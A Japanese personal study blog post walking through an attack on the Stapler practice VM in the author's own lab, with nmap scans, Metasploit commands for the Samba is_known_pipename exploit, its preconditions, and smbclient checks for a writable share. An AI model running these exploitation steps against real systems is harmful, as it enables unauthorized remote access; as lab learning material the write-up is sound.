家studyをつづって

IT技術やセキュリティで勉強したことをつづっています。

Staplerを攻撃する(Sambaの脆弱性)

概要

以前構築したStaplerの環境に攻撃を行ってみました。

 

 

 

実行結果

youtu.be

 

Kali Linux側での実行コマンド

Staplerの情報収集

nmap -n 192.168.1.0/24
nmap -sS -Pn -sV -p- 192.168.1.209
nmap -vvv -A -p 139 192.168.1.209

 
metasploitでの実行コマンド

search pipename
use exploit/linux/samba/is_known_pipename
show options
set rhosts 192.168.1.209
set rport 139
show payloads
set payload cmd/unix/interact
set SMB::AlwaysEncrypt false
set SMB::ProtocolVersion 1

また、動画には含まれていませんが、当該脆弱性の攻撃が成立する条件は以下のものがあります。

  1. Valid credentials
  2. Writeable folder in an accessible share
  3. Server-side path of the writeable folder

github.com

 

上記の条件を満たしているかについて、以下のコマンドで任意のファイルがアップロード可能か試すことで確認することができます。

smbclient -L 192.168.1.209
smbclient //192.168.1.209/tmp
※SMB接続後、任意のファイルをアップします
 put test.txt

 

参考にさせていただいたサイト

www.whitehat.de

www.tiger1997.jp